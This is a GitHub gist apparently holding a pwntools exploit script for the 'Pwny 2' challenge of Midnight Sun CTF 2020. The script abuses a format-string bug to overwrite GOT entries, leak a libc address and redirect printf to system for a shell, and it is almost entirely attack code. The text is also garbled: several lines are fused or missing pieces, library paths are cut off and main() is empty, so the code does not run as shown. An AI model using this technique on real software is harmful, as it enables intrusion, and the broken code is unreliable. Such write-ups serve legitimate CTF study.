Skip to content

Instantly share code, notes, and snippets.

Created Apr 5, 2020
What would you like to do?
MidnighSun CTF 2020 - Pwny 2 write up
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.terminal = ["tmux", "splitw", "-h"]
exe = context.binary = ELF("./challenge")
host = args.HOST or ""
port = int(args.PORT or 10002)
def local(argv=[], *a, **kw):
"""Execute the target binary locally"""
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
return process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
"""Connect to the process on the remote host"""
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
"""Start the exploit against the target."""
if args.LOCAL:
return local(argv, *a, **kw), ELF("/usr/lib32/")
return remote(argv, *a, **kw), ELF("./")
gdbscript = """
b *0x08048688
# -- Exploit goes here --
smain = 0x080485F5
def do(i):
io, libc = start()"exit @ 0x{:08x}".format(["exit"]))
writes = {["exit"]: smain}
payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
io.sendlineafter("input: ", payload)
payload = ""
payload += "%2$08x"
io.sendlineafter("input: ", payload)
_IO_2_1_stdin_ = int(io.recvline(), 16)
libc.address = _IO_2_1_stdin_ - libc.symbols["_IO_2_1_stdin_"]
binsh ="/bin/sh").next()"_IO_2_1_stdin_ @ 0x{:08x}".format(libc.symbols["_IO_2_1_stdin_"]))"Libc @ 0x{:08x}".format(libc.address))"system @ 0x{:08x}".format(libc.symbols["system"]))"/bin/sh @ 0x{:08x}".format(binsh))
writes = {["printf"]: libc.symbols["system"]}
payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
io.sendlineafter("input: ", payload)
def main():
if __name__ == "__main__":
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment